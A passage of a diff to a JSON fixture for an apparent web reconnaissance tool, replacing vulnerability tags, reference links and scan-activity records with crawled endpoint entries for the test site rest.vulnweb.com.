"2024-11-13T02:15:02.834Z", + "response_time": 0.196106707, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 18, "fields": { - "name": "cve2022" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/cs.js?v=1600695504196", + "content_length": 1271, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:02.938Z", + "response_time": 0.19750051, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 19, "fields": { - "name": "carrental" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/article.id", + "content_length": 881, + "page_title": "Page Not Found", + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:03.040Z", + "response_time": 0.20777164099999998, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3, + 4 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 20, "fields": { - "name": "cms" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/api_project.js?v=1596328981612", + "content_length": 11820, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:03.251Z", + "response_time": 0.196545927, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 21, "fields": { - "name": "sqli" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/api_project.js?v=1600695504196", + "content_length": 11820, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:03.357Z", + "response_time": 0.189667934, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 22, "fields": { - "name": "authenticated" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/_col1", + "content_length": 881, + "page_title": "Page Not Found", + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:03.456Z", + "response_time": 0.23266171600000002, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3, + 4 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 23, "fields": { - "name": "car_rental_management_system_project" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/api_project.js?v=1596328982883", + "content_length": 11820, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:03.638Z", + "response_time": 0.19828067, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 24, "fields": { - "name": "headers" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/api_data.js?v=1600695504196", + "content_length": 26511, + "page_title": "test post title", + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:03.731Z", + "response_time": 0.200468143, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 25, "fields": { - "name": "detect" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/de.js?v=1600695504196", + "content_length": 1259, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:03.822Z", + "response_time": 0.276252214, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 26, "fields": { - "name": "aspnet" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/it.js?v=1600695504196", + "content_length": 1274, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:03.908Z", + "response_time": 0.279627316, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 27, "fields": { - "name": "phpstorm" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/it.js?v=1596328981612", + "content_length": 1274, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:04.000Z", + "response_time": 0.280023594, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 28, "fields": { - "name": "jetbrains" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/ca.js?v=1600695504196", + "content_length": 1250, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:04.101Z", + "response_time": 0.284010108, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 29, "fields": { - "name": "idea" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/fr.js?v=1600695504196", + "content_length": 1289, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:04.192Z", + "response_time": 0.29481246800000005, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 30, "fields": { - "name": "exposure" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs", + "content_length": 28698, + "page_title": "Loading...", + "http_status": 200, + "content_type": "text/html; charset=UTF-8", + "discovered_date": "2024-11-13T02:15:04.280Z", + "response_time": 0.446693431, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3, + 4, + 14 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 31, "fields": { - "name": "files" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/img/favicon.ico", + "content_length": 894, + "page_title": null, + "http_status": 200, + "content_type": "image/vnd.microsoft.icon", + "discovered_date": "2024-11-13T02:15:04.402Z", + "response_time": 0.194511156, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 32, "fields": { - "name": "debug" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/_hasType", + "content_length": 881, + "page_title": "Page Not Found", + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:04.492Z", + "response_time": 0.326042325, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3, + 4 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 33, "fields": { - "name": "microsoft" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/css/style.css", + "content_length": 11514, + "page_title": null, + "http_status": 200, + "content_type": "text/css", + "discovered_date": "2024-11-13T02:15:04.597Z", + "response_time": 0.195449007, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 34, "fields": { - "name": "iis" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/api_data.js?v=1596328981612", + "content_length": 26511, + "page_title": "test post title", + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:04.693Z", + "response_time": 0.296613549, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 35, "fields": { - "name": "waf" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/api_data.js?v=1596328982883", + "content_length": 26511, + "page_title": "test post title", + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:04.785Z", + "response_time": 0.281608966, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 36, "fields": { - "name": "xxe" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/ro.js?v=1596328981612", + "content_length": 1263, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:12.158Z", + "response_time": 0.186462385, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilitytags", + "model": "startScan.endpoint", "pk": 37, "fields": { - "name": "blind" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/pt_br.js?v=1600695504196", + "content_length": 1261, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:12.247Z", + "response_time": 0.18560666, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilityreference", - "pk": 1, + "model": "startScan.endpoint", + "pk": 38, "fields": { - "url": "https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/pt_br.js?v=1596328981612", + "content_length": 1261, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:12.334Z", + "response_time": 0.193273554, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilityreference", - "pk": 2, + "model": "startScan.endpoint", + "pk": 39, "fields": { - "url": "https://www.mimecast.com/content/how-to-create-an-spf-txt-record" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/pl.js?v=1600695504196", + "content_length": 1251, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:12.425Z", + "response_time": 0.195231204, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilityreference", - "pk": 3, + "model": "startScan.endpoint", + "pk": 40, "fields": { - "url": "https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/ro.js?v=1600695504196", + "content_length": 1263, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:12.514Z", + "response_time": 0.195014241, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilityreference", - "pk": 4, + "model": "startScan.endpoint", + "pk": 41, "fields": { - "url": "https://owasp.org/www-community/HttpOnly" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/zh.js?v=1600695504196", + "content_length": 1188, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:12.610Z", + "response_time": 0.18584686, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilityreference", - "pk": 5, + "model": "startScan.endpoint", + "pk": 42, "fields": { - "url": "https://owasp.org/www-community/controls/SecureCookieAttribute" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/zh.js?v=1596328981612", + "content_length": 1188, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:12.698Z", + "response_time": 0.193562646, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilityreference", - "pk": 6, + "model": "startScan.endpoint", + "pk": 43, "fields": { - "url": "https://github.com/dirtycoder0124/formcrawler" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/tr.js?v=1596328981612", + "content_length": 1271, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:12.788Z", + "response_time": 0.196630562, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilityreference", - "pk": 7, + "model": "startScan.endpoint", + "pk": 44, "fields": { - "url": "https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/ru.js?v=1600695504196", + "content_length": 1506, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:12.878Z", + "response_time": 0.19659975600000001, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilityreference", - "pk": 8, + "model": "startScan.endpoint", + "pk": 45, "fields": { - "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-32028" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/vi.js?v=1596328981612", + "content_length": 1353, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:12.965Z", + "response_time": 0.19489526000000001, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilityreference", - "pk": 9, + "model": "startScan.endpoint", + "pk": 46, "fields": { - "url": "https://github.com/ARPSyndicate/kenzer-templates" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/locales/zh_cn.js?v=1596328981612", + "content_length": 1211, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:13.061Z", + "response_time": 0.194083618, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilityreference", - "pk": 10, + "model": "startScan.endpoint", + "pk": 47, "fields": { - "url": "https://developer.mozilla.org/en-US/docs/Web/Security/Mixed_content" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/utils/send_sample_request.js?v=1596328981612", + "content_length": 6328, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:13.160Z", + "response_time": 0.188443724, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilityreference", - "pk": 11, + "model": "startScan.endpoint", + "pk": 48, "fields": { - "url": "https://portswigger.net/kb/issues/01000400_mixed-content" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/utils/handlebars_helper.js?v=1596328981612", + "content_length": 10634, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:13.252Z", + "response_time": 0.19793523400000002, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilityreference", - "pk": 12, + "model": "startScan.endpoint", + "pk": 49, "fields": { - "url": "https://resources.infosecinstitute.com/topics/vulnerabilities/https-mixed-content-vulnerability/" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/vendor/github.com/necolas/normalize.css", + "content_length": 881, + "page_title": "Page Not Found", + "http_status": 404, + "content_type": "text/html", + "discovered_date": "2024-11-13T02:15:13.340Z", + "response_time": 0.20213110599999998, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3, + 4 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilityreference", - "pk": 13, + "model": "startScan.endpoint", + "pk": 50, "fields": { - "url": "https://docs.gitlab.com/ee/user/application_security/dast/checks/319.1.html" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/main.js", + "content_length": 29549, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:13.449Z", + "response_time": 0.19744811, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilityreference", - "pk": 14, + "model": "startScan.endpoint", + "pk": 51, "fields": { - "url": "https://portswigger.net/kb/issues/00100800_asp-net-debugging-enabled" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/utils/send_sample_request.js?v=1600695504196", + "content_length": 6328, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:13.542Z", + "response_time": 0.231860227, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.vulnerabilityreference", - "pk": 15, + "model": "startScan.endpoint", + "pk": 52, "fields": { - "url": "https://github.com/Ekultek/WhatWaf" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/vendor/diff_match_patch.min.js?v=1596328981612", + "content_length": 19241, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:13.645Z", + "response_time": 0.197404447, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.scanactivity", - "pk": 1, + "model": "startScan.endpoint", + "pk": 53, "fields": { - "scan_of": 1, - "title": "Subdomain discovery", - "name": "subdomain_discovery", - "time": "2024-09-03T21:28:31.457Z", - "status": 2, - "error_message": null, - "traceback": null, - "celery_id": "be34c2cd-c7b3-41df-abd6-3e12bb512ea3" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/vendor/bootstrap.min.js?v=1596328981612", + "content_length": 37051, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:13.738Z", + "response_time": 0.20059506, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.scanactivity", - "pk": 2, + "model": "startScan.endpoint", + "pk": 54, "fields": { - "scan_of": 1, - "title": "OS Intelligence", - "name": "osint", - "time": "2024-09-03T21:26:58.275Z", - "status": 2, - "error_message": null, - "traceback": null, - "celery_id": "a0d9c581-9f0f-46e9-ad45-2abb20681fe0" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/vendor/list.min.js?v=1596328981612", + "content_length": 15953, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:13.827Z", + "response_time": 0.20751730699999998, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.scanactivity", - "pk": 3, + "model": "startScan.endpoint", + "pk": 55, "fields": { - "scan_of": 1, - "title": "Http crawl", - "name": "http_crawl", - "time": "2024-09-03T21:28:31.186Z", - "status": 2, - "error_message": null, - "traceback": null, - "celery_id": null + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/vendor/path-to-regexp/index.js?v=1596328981612", + "content_length": 5351, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:13.913Z", + "response_time": 0.186692743, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.scanactivity", - "pk": 4, + "model": "startScan.endpoint", + "pk": 56, "fields": { - "scan_of": 1, - "title": "Port scan", - "name": "port_scan", - "time": "2024-09-03T21:29:11.664Z", - "status": 2, - "error_message": null, - "traceback": null, - "celery_id": "13e72a80-8f84-4ae6-b47f-081f0ecd4b6c" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/vendor/polyfill.js", + "content_length": 2996, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:14.003Z", + "response_time": 0.184336678, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.scanactivity", - "pk": 5, + "model": "startScan.endpoint", + "pk": 57, "fields": { - "scan_of": 1, - "title": "Fetch URL", - "name": "fetch_url", - "time": "2024-09-03T22:02:45.068Z", - "status": 2, - "error_message": null, - "traceback": null, - "celery_id": "3596c2c2-2dca-4164-b342-b5046c697304" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/vendor/list.min.js?v=1600695504196", + "content_length": 15953, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:14.104Z", + "response_time": 0.199162747, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.scanactivity", - "pk": 6, + "model": "startScan.endpoint", + "pk": 58, "fields": { - "scan_of": 1, - "title": "Directories & files fuzz", - "name": "dir_file_fuzz", - "time": "2024-09-03T22:13:05.287Z", - "status": 2, - "error_message": null, - "traceback": null, - "celery_id": "032f40df-a5f0-4fb6-bb06-63b73a54bd17" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/vendor/path-to-regexp/index.js?v=1600695504196", + "content_length": 5351, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:14.191Z", + "response_time": 0.194235887, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.scanactivity", - "pk": 7, + "model": "startScan.endpoint", + "pk": 59, "fields": { - "scan_of": 1, - "title": "Vulnerability scan", - "name": "vulnerability_scan", - "time": "2024-09-03T22:29:16.424Z", - "status": 2, - "error_message": null, - "traceback": null, - "celery_id": "6673b166-bc55-4440-a217-9932b697cd69" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/vendor/lodash.custom.min.js?v=1596328981612", + "content_length": 19619, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:14.280Z", + "response_time": 0.19445568, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.scanactivity", - "pk": 8, + "model": "startScan.endpoint", + "pk": 60, "fields": { - "scan_of": 1, - "title": "Screenshot", - "name": "screenshot", - "time": "2024-09-03T22:03:01.734Z", - "status": 2, - "error_message": null, - "traceback": null, - "celery_id": "dc33f486-7ad0-4c73-a355-4c93df4538af" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/vendor/prettify.css", + "content_length": 2007, + "page_title": null, + "http_status": 200, + "content_type": "text/css", + "discovered_date": "2024-11-13T02:15:14.368Z", + "response_time": 0.1849672, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.scanactivity", - "pk": 9, + "model": "startScan.endpoint", + "pk": 61, "fields": { - "scan_of": 1, - "title": "WAF detection", - "name": "waf_detection", - "time": "2024-09-03T22:03:10.096Z", - "status": 2, - "error_message": null, - "traceback": null, - "celery_id": "c4ccc7f8-b370-4354-9a6a-098ba13fde0f" - } + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/vendor/lodash.custom.min.js?v=1600695504196", + "content_length": 19619, + "page_title": null, + "http_status": 200, + "content_type": "application/javascript", + "discovered_date": "2024-11-13T02:15:14.456Z", + "response_time": 0.199168104, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] + } }, { - "model": "startScan.scanactivity", - "pk": 10, + "model": "startScan.endpoint", + "pk": 62, "fields": { - "scan_of": 1, - "title": "Nuclei Scan", - "name": "nuclei_scan", - "time": "2024-09-03T22:29:15.243Z", - "status": 2, - "error_message": null, - "traceback": null, - "celery_id": "b74526bd-8f9a-4738-a98f-876ba776da33" + "scan_history": 1, + "target_domain": 1, + "subdomain": 68, + "source": null, + "http_url": "http://rest.vulnweb.com/docs/vendor/bootstrap.min.css", + "content_length": 121205, + "page_title": null, + "http_status": 200, + "content_type": "text/css", + "discovered_date": "2024-11-13T02:15:14.543Z", + "response_time": 0.30437782900000004, + "webserver": "Apache/2.4.25 (Debian)", + "is_default": false, + "matched_gf_patterns": null, + "techs": [ + 2, + 3 + ], + "endpoint_subscan_ids": [] } }, { - "model": "startScan.scanactivity", - "pk": 11, + "model": "startScan.endpoint", + "pk": 63, "fields": { - "scan_of": 1, - "title": "Nuclei Scan with severity unknown", - "name": "nuclei_individual_severity_module", - "time": "2024-09-03T22:04:05.946Z", - "status": 2, - 